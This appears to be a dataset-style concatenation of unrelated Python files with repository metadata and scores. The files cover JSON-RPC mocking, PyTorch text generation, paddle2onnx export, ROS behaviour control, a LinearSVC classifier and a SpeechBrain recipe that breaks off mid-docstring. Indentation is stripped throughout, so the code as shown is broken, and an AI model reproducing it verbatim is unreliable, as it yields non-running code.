json_data = json.loads(request_text)
if isinstance(json_data, (list, tuple)):
response = xjsonrpc.BatchResponse()
for request in xjsonrpc.BatchRequest.from_json(json_data):
response.append(
self._match_request(endpoint, request.version, request.method, request.params, request.id),
)
else:
request = xjsonrpc.Request.from_json(json_data)
response = self._match_request(endpoint, request.version, request.method, request.params, request.id)
if self._async_resp:
async def wrapper():
return json.dumps(response.to_json())
return wrapper()
else:
return json.dumps(response.to_json())
def _match_request(
self,
endpoint: str,
version: str,
method_name: str,
params: Optional[Union[list, dict]],
id: Optional[Union[int, str]],
) -> Response:
matches = self._matches[endpoint].get((version, method_name))
if matches is None:
return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name))
match = matches.pop(0)
if not match.once:
matches.append(match)
self._cleanup_matches(endpoint, version, method_name)
stub = self.calls[endpoint].setdefault(
(version, method_name),
self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'),
)
if isinstance(params, (list, tuple)):
stub(*params)
else:
stub(**params)
if match.callback:
if isinstance(params, (list, tuple)):
result = match.callback(*params)
else:
result = match.callback(**params)
return xjsonrpc.Response(id=id, result=result)
else:
return xjsonrpc.Response(
id=id or match.response_data['id'],
result=match.response_data['result'],
error=match.response_data['error'],
)
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
self.reset()
# shortcuts
PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request')
PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request')
@pytest.fixture
def xjsonrpc_requests_mocker():
"""
Requests client mocking fixture.
"""
with PjRpcRequestsMocker() as mocker:
yield mocker
@pytest.fixture
def xjsonrpc_aiohttp_mocker():
"""
Aiohttp client mocking fixture.
"""
with PjRpcAiohttpMocker() as mocker:
yield mocker
| 2.4375 | 2 |
scripts/temp/palindrome.py | AgnirudraSil/tetris | 3 | 12796217 | <reponame>AgnirudraSil/tetris<filename>scripts/temp/palindrome.py
inp = input("Enter a number or word: ")
if inp[::-1].lower() == inp.lower():
print("Palindrome")
else:
print("Not Palindrome")
| 3.734375 | 4 |
schedy/pbt.py | incalia/schedy-client | 4 | 12796218 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
#: Minimize the objective
MINIMIZE = 'min'
#: Maximize the objective
MAXIMIZE = 'max'
class Truncate(object):
_EXPLOIT_STRATEGY_NAME = 'truncate'
def __init__(self, proportion=0.2):
'''
Truncate exploit strategy: if the selected candidate job is in the
worst n%, use a candidate job in the top n% instead.
Args:
proportion (float): Proportion of jobs that are considered to be
"best" jobs, and "worst" jobs. For example, if ``proportion =
0.2``, if the selected candidate job is in the bottom 20%, it
will be replaced by a job in the top 20%. Must satisfy ``0 <
proportion <= 0.5``.
'''
self.proportion = proportion
def _get_params(self):
return self.proportion
@classmethod
def _from_params(cls, params):
proportion = float(params)
return cls(proportion)
def __eq__(self, other):
return type(self) == type(other) and \
self.proportion == other.proportion
class Perturb(object):
_EXPLORE_STRATEGY_NAME = 'perturb'
def __init__(self, min_factor=0.8, max_factor=1.2):
'''
Perturb explore strategy: multiply the designated hyperparameter by a
random factor, sampled from a uniform distribution.
Args:
min_factor (float): Minimum value for the factor (inclusive).
max_factor (float): Maximum value for the factor (exclusive).
'''
self.min_factor = min_factor
self.max_factor = max_factor
def _get_params(self):
return {
'minFactor': float(self.min_factor),
'maxFactor': float(self.max_factor),
}
@classmethod
def _from_params(cls, params):
min_factor = float(params['minFactor'])
max_factor = float(params['maxFactor'])
return cls(min_factor, max_factor)
def __eq__(self, other):
return type(self) == type(other) and \
self.min_factor == other.min_factor and \
self.max_factor == other.max_factor
_EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [
Truncate
]}
_EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in [
Perturb
]}
| 3.375 | 3 |
dl/pytorch/rnn/tv_script.py | xta0/Python-Playground | 0 | 12796219 | # load in data
import helper
import numpy as np
import torch
import torch.nn as nn
from string import punctuation
from collections import Counter
from torch.utils.data import TensorDataset, DataLoader
data_dir = './data/Seinfeld_Scripts.txt'
text = helper.load_data(data_dir)
# Check for a GPU
train_on_gpu = torch.cuda.is_available()
if not train_on_gpu:
print('No GPU found. Please use a GPU to train your neural network.')
def create_lookup_tables(text):
"""
Create lookup tables for vocabulary
:param text: The text of tv scripts split into words
:return: A tuple of dicts (vocab_to_int, int_to_vocab)
"""
word_counts = Counter(text)
sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True)
int_to_vocab = {ii: word for ii, word in enumerate(sorted_vocab)}
vocab_to_int = {word: ii for ii, word in int_to_vocab.items()}
return vocab_to_int, int_to_vocab
def token_lookup():
"""
Generate a dict to turn punctuation into a token.
:return: Tokenized dictionary where the key is the punctuation and the value is the token
"""
return {
'.': '||PERIOD||',
',': '||COMMA||',
'"': '||QUOTATION_MARK||',
';': '||SEMICOLON||',
'!': '||EXCLAMATION_MARK||',
'?': '||QUESTION_MARK||',
'(': '||LEFT_PAREN>||',
')': '||RIGHT_PAREN||',
'-': '||DASH||',
'\n': '||RETURN||',
}
helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)
def batch_data(words, sequence_length, batch_size):
"""
Batch the neural network data using DataLoader
:param words: The word ids of the TV scripts
:param sequence_length: The sequence length of each batch
:param batch_size: The size of each batch; the number of sequences in a batch
:return: DataLoader with batched data
"""
n_batches = len(words)//batch_size
words = words[:n_batches*batch_size]
features = []
targets = []
total = len(words)-sequence_length
for idx in range(0, total):
x = words[idx:idx+sequence_length]
features.append(x)
y = words[idx+sequence_length]
targets.append(y)
train_x = np.array(features)
train_y = np.array(targets)
train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y))
train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size)
# return a dataloader
return train_loader
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
print(token_dict)
print(int_text[:10])
print(list(vocab_to_int.values())[:10])
print(list(int_to_vocab.values())[:10])
class RNN(nn.Module):
def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
"""
Initialize the PyTorch RNN Module
:param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)
:param output_size: The number of output dimensions of the neural network
:param embedding_dim: The size of embeddings, should you choose to use them
:param hidden_dim: The size of the hidden layer outputs
:param dropout: dropout to add in between LSTM/GRU layers
"""
super(RNN, self).__init__()
# set class variables
self.output_size = output_size
self.n_layers = n_layers
self.hidden_dim = hidden_dim
# define model layers
self.embedding = nn.Embedding(vocab_size, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers,
dropout=dropout, batch_first=True)
self.fc = nn.Linear(hidden_dim, output_size)
self.dropout = nn.Dropout(dropout)
def forward(self, nn_input, hidden):
"""
Forward propagation of the neural network
:param nn_input: The input to the neural network
:param hidden: The hidden state
:return: Two Tensors, the output of the neural network and the latest hidden state
"""
batch_size = nn_input.size(0)
x = self.embedding(nn_input)
x,h = self.lstm(x, hidden)
x = x.contiguous().view(-1, self.hidden_dim)
# x = self.dropout(x)
x = self.fc(x)
x = x.view(batch_size, -1, self.output_size)
x = x[:, -1]
# return one batch of output word scores and the hidden state
return x, h
def init_hidden(self, batch_size):
'''
Initialize the hidden state of an LSTM/GRU
:param batch_size: The batch_size of the hidden state
:return: hidden state of dims (n_layers, batch_size, hidden_dim)
'''
# Implement function
weight = next(self.parameters()).data
if (train_on_gpu):
hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(),
weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda())
else:
hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),
weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())
return hidden
def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
"""
Forward and backward propagation on the neural network
:param decoder: The PyTorch Module that holds the neural network
:param decoder_optimizer: The PyTorch optimizer for the neural network
:param criterion: The PyTorch loss function
:param inp: A batch of input to the neural network
:param target: The target output for the batch of input
:return: The loss and the latest hidden state Tensor
"""
# move data to GPU, if available
if train_on_gpu:
inp, target = inp.cuda(), target.cuda()
# perform backpropagation and optimization
h = tuple([each.data for each in hidden])
rnn.zero_grad()
output, h = rnn(inp, h)
loss = criterion(output, target)
loss.backward()
nn.utils.clip_grad_norm_(rnn.parameters(), 5)
optimizer.step()
# return the loss over a batch and the hidden state produced by our model
return loss.item(), h
def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):
batch_losses = []
rnn.train()
print("Training for %d epoch(s)..." % n_epochs)
for epoch_i in range(1, n_epochs + 1):
# initialize hidden state
hidden = rnn.init_hidden(batch_size)
for batch_i, (inputs, labels) in enumerate(train_loader, 1):
# make sure you iterate over completely full batches, only
n_batches = len(train_loader.dataset)//batch_size
if(batch_i > n_batches):
break
# forward, back prop
loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)
# record loss
batch_losses.append(loss)
# printing loss stats
if batch_i % show_every_n_batches == 0:
print('Epoch: {:>4}/{:<4} Loss: {}\n'.format(
epoch_i, n_epochs, np.average(batch_losses)))
batch_losses = []
# returns a trained rnn
return rnn
# Data params
# Sequence Length
sequence_length = 8 # of words in a sequence
# Batch Size
batch_size = 100
# data loader - do not change
train_loader = batch_data(int_text, sequence_length, batch_size)
# Training parameters
# Number of Epochs
num_epochs = 5
# Learning Rate
learning_rate = 0.001
# Model parameters
# Vocab size
vocab_size = len(vocab_to_int)
# Output size
output_size = vocab_size
# Embedding Dimension
embedding_dim = 128
# Hidden Dimension
hidden_dim = 512
# Number of RNN Layers
n_layers = 2
# Show stats for every n number of batches
show_every_n_batches = 500
# create model and move to gpu if available
rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)
if train_on_gpu:
rnn.cuda()
# defining loss and optimization functions for training
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
criterion = nn.CrossEntropyLoss()
# training the model
trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)
# saving the trained model
helper.save_model('./trained_tv_script', trained_rnn)
print('Model Trained and Saved')
_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
trained_rnn = helper.load_model('./trained_tv_script')
import torch.nn.functional as F
def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):
"""
Generate text using the neural network
:param decoder: The PyTorch Module that holds the trained neural network
:param prime_id: The word id to start the first prediction
:param int_to_vocab: Dict of word id keys to word values
:param token_dict: Dict of puncuation tokens keys to puncuation values
:param pad_value: The value used to pad a sequence
:param predict_len: The length of text to generate
:return: The generated text
"""
rnn.eval()
# create a sequence (batch_size=1) with the prime_id
current_seq = np.full((1, sequence_length), pad_value)
current_seq[-1][-1] = prime_id
predicted = [int_to_vocab[prime_id]]
for _ in range(predict_len):
if train_on_gpu:
current_seq = torch.LongTensor(current_seq).cuda()
else:
current_seq = torch.LongTensor(current_seq)
# initialize the hidden state
hidden = rnn.init_hidden(current_seq.size(0))
# get the output of the rnn
output, _ = rnn(current_seq, hidden)
# get the next word probabilities
p = F.softmax(output, dim=1).data
if(train_on_gpu):
p = p.cpu() # move to cpu
# use top_k sampling to get the index of the next word
top_k = 5
p, top_i = p.topk(top_k)
top_i = top_i.numpy().squeeze()
# select the likely next word index with some element of randomness
p = p.numpy().squeeze()
word_i = np.random.choice(top_i, p=p/p.sum())
# retrieve that word from the dictionary
word = int_to_vocab[word_i]
predicted.append(word)
# the generated word becomes the next "current sequence" and the cycle can continue
current_seq = np.roll(current_seq, -1, 1)
current_seq[-1][-1] = word_i
gen_sentences = ' '.join(predicted)
# Replace punctuation tokens
for key, token in token_dict.items():
ending = ' ' if key in ['\n', '(', '"'] else ''
gen_sentences = gen_sentences.replace(' ' + token.lower(), key)
gen_sentences = gen_sentences.replace('\n ', '\n')
gen_sentences = gen_sentences.replace('( ', '(')
# return all the sentences
return gen_sentences
# run the cell multiple times to get different results!
gen_length = 400 # modify the length to your preference
prime_word = 'jerry' # name for starting the script
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
pad_word = helper.SPECIAL_WORDS['PADDING']
generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)
print(generated_script) | 2.921875 | 3 |
python3/incident/set-owner-and-members-by-phase.py | ibmresilient/resilient-scripts | 26 | 12796220 | <filename>python3/incident/set-owner-and-members-by-phase.py
# (c) Copyright IBM Corp. 2010, 2020. All Rights Reserved.
# Script to set incident owner and members based on Incident Phase.
# To be run when the phase changes.
# Phase is a select field with API name `phase_id`,
# so the tests below are written as
# if incident.phase_id == "value":
# Based on the current phase name, set a single Group or User as Incident Owner.
# NOTE:
# When you change the owner of an incident, the previous owner is removed,
# but also automatically added to Members so they still has access to the incident.
if incident.phase_id == 'Post-Incident':
incident.owner_id = "Group_Name"
elif incident.phase_id == 'Some Other Phase':
incident.owner_id = "<EMAIL>"
# Based on the current phase name, add members to the incident.
# The list of members can include multiple groups and individual users.
# NOTE:
# Here we **add** the new members to the existing list,
# don't just overwrite the existing list (which would remove members)!
if incident.phase_id == 'Phase_Name':
incident.members = list(incident.members) + \
["Group_Name", "<EMAIL>"]
| 2.78125 | 3 |
data/external/repositories_2to3/238397/ucla-cs145-kaggle-master/linearsvclassifier.py | Keesiu/meta-kaggle | 0 | 12796221 | <gh_stars>0
"""
linearsvclassifier.py
Builds a linear support vector classifier
~78 pct accuracy, 0m10.881s execution time
"""
from classifier import Classifier
from matrixdatabase import MatrixDatabase
from sklearn.svm import LinearSVC as SVC
class LinearSVClassifier(Classifier):
def __init__(self, matrixdatabase):
self._matrix_database = matrixdatabase
self._has_fit = False
self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False)
def learn(self, ingredients, cuisine):
return
def classify(self, ingredients):
if not self._has_fit:
matrix, classes = self._matrix_database.make_train_matrix()
self._svc = self._svc.fit(matrix, classes)
print('Fitting complete...')
self._has_fit = True
output = self._svc.predict(self._matrix_database.make_row_from_recipe(ingredients))
return output[0] | 2.390625 | 2 |
alana_pepper/src/alana_node_classes/behaviour_manager.py | cdondrup/inaugural_pepper | 0 | 12796222 | import rospy
import service_utils as su
from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest
from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest
def start_behaviour(name):
su.call_service(
"/naoqi_driver/behaviour_manager/start_behaviour",
BehaviorManagerControl,
BehaviorManagerControlRequest(name=name)
)
def stop_behaviour(name):
su.call_service(
"/naoqi_driver/behaviour_manager/stop_behaviour",
BehaviorManagerControl,
BehaviorManagerControlRequest(name=name)
)
def toggle_behaviour(name):
try:
start_behaviour(name)
except:
pass
try:
stop_behaviour(name)
except:
pass
def wait_for_behaviour(name):
while not rospy.is_shutdown():
if name not in su.call_service(
"/naoqi_driver/behaviour_manager/get_running_behaviors",
BehaviorManagerInfo,
BehaviorManagerInfoRequest()
).behaviors:
return
else:
rospy.sleep(.01)
| 2.171875 | 2 |
next_word_prediction_using_universal_sentence_encoder.py | Adminixtrator/Next-Word-Prediction-using-Universal-Sentence-Encoder. | 4 | 12796223 | # -*- coding: utf-8 -*-
"""Next-Word Prediction using Universal Sentence Encoder.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL
# **Google drive for local storage**
_NB: All comments are written to facilitate smooth evaluation of the model, that the **Current User** may be less fatigued and see beauty in the good work._
Uncomment text under **PREVIEW OUTPUT** to further scrutinize.
"""
# Commented out IPython magic to ensure Python compatibility.
# This cell will prompt an external url to accept permissions for Colab to access Google Drive
from google.colab import drive
drive.mount("/gdrive")
# %ls
"""# **Import ***"""
# Getting all required libraries
import os
import re
import gdown
import numpy
import string
import numpy as np
import pandas as pd
import seaborn as sns
import tensorflow as tf
from absl import logging
import tensorflow_hub as hub
from tensorflow import keras
import matplotlib.pyplot as plt
from keras.models import Sequential
import tensorflow.keras.backend as K
from keras.layers.recurrent import LSTM
from keras.layers import Dense, Activation
from keras.callbacks import LambdaCallback
from keras.utils.data_utils import get_file
from keras.layers.embeddings import Embedding
from sklearn.model_selection import train_test_split
"""## **Data preparation - _Generating Corpus_**"""
# Download data from Google drive
'''
ORIGINAL DATASET URL:
https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt
'''
url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW'
output = 'corpus.txt'
gdown.download(url, output, quiet=False)
# sentence_length = 40
# Read local file from directory
with open('corpus.txt') as subject:
cache = subject.readlines()
translator = str.maketrans('', '', string.punctuation) # Remove punctuation
lines = [doc.lower().translate(translator) for doc in cache] # Switch to lower case
# PREVIEW OUTPUT ::
# print(lines[0][:100])
# len(lines)
# Generate an list of single/independent words
vocabulary = list(set(' '.join(lines).replace('\n','').split(' ')))
primary_store = {}
for strings, texts in enumerate(vocabulary):
primary_store[texts] = strings
# PREVIEW OUTPUT ::
# print(vocabulary[:50])
# len(vocabulary)
# Splitting data into Train sets and test sets
X = []
y = []
for c in lines:
xxxx = c.replace('\n','').split(' ')
X.append(' '.join(xxxx[:-1])) # X from the corpus
yyyy = [0 for i in range(len(vocabulary))] # Generate Y from the Vocabulary
# yyyy[primary_store[xxxx[-1]]] = 1
yyyy[primary_store[xxxx[-1]]] = 1
y.append(yyyy)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)
y_test = numpy.array(y_test)
y_train = numpy.array(y_train)
# PREVIEW OUTPUT ::
# print(X_train[:10])
# print(y_train[:10])
# print(X_test[:10])
# print(y_test[:10])
"""## **Embeddings!**"""
# Import the Universal Sentence Encoder's TF Hub module (Here we're making use of version 4)
# This will take a while but won't be long :)
module_url = "https://tfhub.dev/google/universal-sentence-encoder/4"
appreciate = hub.load(module_url)
# Making it easier - Function for embedding
def embed(goodness):
return appreciate(goodness)
# REVIEW OUTPUT ::
# appreciate.variables
# Wrapping up with the U-S-E
X_train = embed(X_train)
X_test = embed(X_test)
X_train = X_train.numpy()
X_test = X_test.numpy()
# PREVIEW OUTPUT ::
# print(X_train[:10])
# print(y_train[:10])
# print(X_test[:10])
# print(y_test[:10])
# print(X_train.shape, X_test.shape, y_test.shape, y_train.shape)
"""# **Building the model**"""
model = Sequential()
# model.add(Embedding(input_dim=len(vocabulary), output_dim=100))
model = Sequential()
# model.add(LSTM(units=100, input_shape=[512]))
model.add(Dense(512, input_shape=[512], activation = 'relu'))
model.add(Dense(units=len(vocabulary), activation = 'softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.summary()
# Training the model.
model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()])
"""#**Unto the tests!**"""
# Create function to predict and show detailed output
def next_word(collection=[], extent=1):
for item in collection:
text = item
for i in range(extent):
prediction = model.predict(x=embed([item]).numpy())
idx = np.argmax(prediction[-1])
item += ' ' + vocabulary[idx]
print(text + ' --> ' + item + '\nNEXT WORD: ' + item.split(' ')[-1] + '\n')
# Tests - please feel free to explore
single_text = ['and some other essential']
next_word(single_text)
# Testing on a collection of words
text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex', 'a']
next_word(text_collection)
"""## **For the record**
The Dataset is based on a Tensorflow tutorial from Stanford, so all predicted words will be based on Deep learning and Machine learning _common terms_.
"""
# Storing data
vocabulary = numpy.array(vocabulary)
numpy.save('./vocabulary.npy', vocabulary)
model.save('./NWP-USE')
## END OF NOTEBOOK | 2.3125 | 2 |
paddle2onnx/graph/dygraph_helper.py | neonhuang/Paddle2ONNX | 95 | 12796224 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
import numpy as np
import inspect
import six
import paddle
from paddle.fluid.io import _get_valid_program
from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction
from paddle.fluid.layers.utils import flatten, pack_sequence_as
from collections import OrderedDict
from paddle.fluid import dygraph
from paddle.fluid.dygraph.jit import declarative
from paddle.fluid import core
from paddle.fluid import layers
from paddle.nn import Layer
from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard
from paddle.fluid.dygraph.layers import Layer
from paddle2onnx.utils import logging
from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops
def _get_input_var_names(inputs, input_spec):
name_none_error = "The %s's name is None. " \
"When using jit.save, please set InputSepc's name in " \
"to_static(input_spec=[]) and jit.save(input_spec=[]) " \
"and make sure they are consistent."
name_no_exists_error = "The tensor `%s` does not exists. " \
"Please make sure the name of InputSpec or example Tensor " \
"in input_spec is the same as the name of InputSpec in " \
"`to_static` decorated on the Layer.forward method."
result_list = []
input_var_names = [
var.name for var in flatten(inputs) if isinstance(var, Variable)
]
if input_spec is None:
# no prune
return input_var_names
else:
# fileter out non-tensor type spec infos.
input_spec = [
spec for spec in input_spec
if isinstance(spec, paddle.static.InputSpec)
]
if len(input_spec) == len(input_var_names):
# no prune
result_list = input_var_names
# if input spec name not in input_var_names, only raise warning
for spec in input_spec:
if spec.name is None:
warnings.warn(name_none_error % spec)
elif spec.name not in input_var_names:
warnings.warn(name_no_exists_error % spec.name)
else:
# do nothing
pass
else:
# prune
for spec in input_spec:
if spec.name is None:
# name is None, the input_spec only can be InputSpec
raise ValueError(name_none_error % spec)
elif spec.name not in input_var_names:
# the input_spec can be `InputSpec` or `VarBase`
raise ValueError(name_no_exists_error % spec.name)
else:
result_list.append(spec.name)
return result_list
def _get_output_vars(outputs, output_spec):
name_no_exists_error = "The tensor `%s` does not exists. " \
"Please make sure the name of example Tensor " \
"in configs.output_spec is the output tensor of " \
"Layer.forward method."
result_list = []
output_vars_dict = OrderedDict()
for var in flatten(outputs):
if isinstance(var, Variable):
output_vars_dict[var.name] = var
if output_spec is None:
result_list = output_vars_dict.values()
elif output_spec is not None and len(output_spec) == len(output_vars_dict):
result_list = output_vars_dict.values()
for var in output_spec:
if var.name not in output_vars_dict:
warnings.warn(name_no_exists_error % var.name)
else:
for var in output_spec:
if var.name not in output_vars_dict:
raise ValueError(name_no_exists_error % var.name)
else:
result_list.append(output_vars_dict[var.name])
return result_list
@dygraph.base.switch_to_static_graph
def get_program(layer, input_spec, output_spec, **configs):
paddle.jit.set_verbosity(0)
prog_translator = ProgramTranslator()
if not prog_translator.enable_to_static:
raise RuntimeError(
"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False."
)
if not isinstance(layer, Layer):
raise TypeError(
"The input of paddle2onnx should be 'Layer', but received input type is %s."
% type(layer))
if isinstance(layer, paddle.DataParallel):
inner_layer = layer._layers
else:
inner_layer = layer
# avoid change user given input_spec
inner_input_spec = None
if input_spec is not None:
for attr_func in dir(inner_layer):
static_func = getattr(inner_layer, attr_func, None)
if isinstance(static_func,
StaticFunction) and 'forward' != attr_func:
raise ValueError(
"If there are static functions other than 'forward' that need to be saved, the input 'input_spec' should be None, but received the type of 'input_spec' is %s."
% type(input_spec))
if not isinstance(input_spec, (list, tuple)):
raise TypeError(
"The input input_spec should be 'list', but received input_spec's type is %s."
% type(input_spec))
inner_input_spec = []
for var in flatten(input_spec):
if isinstance(var, paddle.static.InputSpec):
inner_input_spec.append(var)
elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)):
inner_input_spec.append(
paddle.static.InputSpec.from_tensor(var))
else:
# NOTE(Aurelius84): Support non-Tensor type in `input_spec`.
inner_input_spec.append(var)
extra_var_info = dict()
functions = dir(inner_layer)
for attr_func in functions:
static_func = getattr(inner_layer, attr_func, None)
if isinstance(static_func, StaticFunction):
concrete_program = static_func.concrete_program_specify_input_spec(
inner_input_spec)
elif 'forward' == attr_func:
# transform in jit.save, if input_spec is incomplete, declarative will throw error
# inner_input_spec is list[InputSpec], it should be packed with same structure
# as original input_spec here.
if inner_input_spec:
inner_input_spec = pack_sequence_as(input_spec,
inner_input_spec)
static_forward = declarative(
inner_layer.forward, input_spec=inner_input_spec)
concrete_program = static_forward.concrete_program
# the input_spec has been used in declarative, which is equal to
# @declarative with input_spec and jit.save without input_spec,
# avoid needless warning
inner_input_spec = None
else:
continue
input_var_names = _get_input_var_names(concrete_program.inputs,
inner_input_spec)
# NOTE(chenweihang): [ Get output variables ]
# the rule is like [ Get input variables name ]. For output var,
# we only support VarBase spec, and actually, we only need the
# var name of output, and we don't recommended to use output_spec
output_vars = _get_output_vars(concrete_program.outputs, output_spec)
feeded_var_names = input_var_names
target_vars = output_vars
main_program = concrete_program.main_program.clone()
export_for_deployment = True
if isinstance(feeded_var_names, six.string_types):
feeded_var_names = [feeded_var_names]
elif export_for_deployment:
if len(feeded_var_names) > 0:
# TODO(paddle-dev): polish these code blocks
if not (bool(feeded_var_names) and all(
isinstance(name, six.string_types)
for name in feeded_var_names)):
raise ValueError("'feed_var_names' should be a list of str.")
if isinstance(target_vars, Variable):
target_vars = [target_vars]
elif export_for_deployment:
if not (bool(target_vars) and
all(isinstance(var, Variable) for var in target_vars)):
raise ValueError("'target_vars' should be a list of Variable.")
main_program = _get_valid_program(main_program)
# remind user to set auc_states to zeros if the program contains auc op
all_ops = main_program.global_block().ops
for op in all_ops:
# clear device of Op
device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName()
op._set_attr(device_attr_name, "")
if op.type == 'auc':
warnings.warn(
"please ensure that you have set the auc states to zeros before saving inference model"
)
break
with program_guard(main_program):
uniq_target_vars = []
for i, var in enumerate(target_vars):
uniq_target_vars.append(var)
target_vars = uniq_target_vars
target_var_name_list = [var.name for var in target_vars]
origin_program = main_program.clone()
main_program = main_program.clone()
global_block = main_program.global_block()
need_to_remove_op_index = []
for i, op in enumerate(global_block.ops):
op.desc.set_is_target(False)
if op.type == "feed" or op.type == "fetch":
need_to_remove_op_index.append(i)
for index in need_to_remove_op_index[::-1]:
global_block._remove_op(index)
main_program.desc.flush()
main_program = main_program._prune_with_input(
feeded_var_names=feeded_var_names, targets=target_vars)
main_program = main_program._inference_optimize(prune_read_op=True)
fetch_var_names = [v.name for v in target_vars]
for target_v in target_vars:
if not main_program.global_block().has_var(target_v.name):
main_program.global_block().create_var(
name=target_v.name,
shape=target_v.shape,
dtype=target_v.dtype,
persistable=target_v.persistable)
prepend_feed_ops(main_program, feeded_var_names)
append_fetch_ops(main_program, fetch_var_names)
main_program.desc._set_version()
paddle.fluid.core.save_op_version_info(main_program.desc)
main_program._copy_dist_param_info_from(origin_program)
return main_program, feeded_var_names, target_vars
| 1.945313 | 2 |
recipes/LibriSpeech/ASR/transformer/train_cl.py | Darshan7575/speechbrain | 0 | 12796225 | <reponame>Darshan7575/speechbrain
#!/usr/bin/env python3
"""Recipe for training a Transformer ASR system with librispeech.
The system employs an encoder, a decoder, and an attention mechanism
between them. Decoding is performed with (CTC/Att joint) beamsearch coupled with a neural
language model.
To run this recipe, do the following:
> python train.py hparams/transformer.yaml
> python train.py hparams/conformer.yaml
With the default hyperparameters, the system employs a convolutional frontend and a transformer.
The decoder is based on a Transformer decoder. Beamsearch coupled with a Transformer
language model is used on the top of decoder probabilities.
The neural network is trained on both CTC and negative-log likelihood
targets and sub-word units estimated with Byte Pairwise Encoding (BPE)
are used as basic recognition tokens. Training is performed on the full
LibriSpeech dataset (960 h).
The best model is the average of the checkpoints from last 5 epochs.
The experiment file is flexible enough to support a large variety of
different systems. By properly changing the parameter files, you can try
different encoders, decoders, tokens (e.g, characters instead of BPE),
training split (e.g, train-clean 100 rather than the full one), and many
other possible variations.
Authors
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
* <NAME> 2021
"""
import os
import torch
from torch.utils.tensorboard import SummaryWriter
import sys
import logging
from pathlib import Path
import speechbrain as sb
from hyperpyyaml import load_hyperpyyaml
from speechbrain.utils.distributed import run_on_main
from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset
from speechbrain.dataio.sampler import ReproducibleRandomSampler
from tqdm.contrib import tqdm
import numpy as np
from functools import cmp_to_key
from torch.utils.data import DataLoader
from speechbrain.dataio.dataloader import LoopedLoader
from speechbrain.core import Stage
import time
def make_dataloader(
dataset, stage, ckpt_prefix="dataloader-", **loader_kwargs,
):
# TRAIN stage is handled specially.
dataloader = sb.dataio.dataloader.make_dataloader(
dataset, **loader_kwargs
)
return dataloader
class CurriculumOrientedDynamicDataset(DynamicItemDataset):
def curriculum_based_filtered_sorted(
self,
key_min_value={},
key_max_value={},
key_test={},
min_weight=None,
max_weight=None,
weights=None,
ordering_info="",
batch_selection="contiguous",
batch_size=8,
select_n=None,
):
"""Get a filtered and/or sorted version of this based on specified curriculum, shares static data.
The reason to implement these operations in the same method is that
computing some dynamic items may be expensive, and this way the
filtering and sorting steps don't need to compute the dynamic items
twice.
Arguments
---------
key_min_value : dict
Map from key (in data or in dynamic items) to limit, will only keep
data_point if data_point[key] >= limit
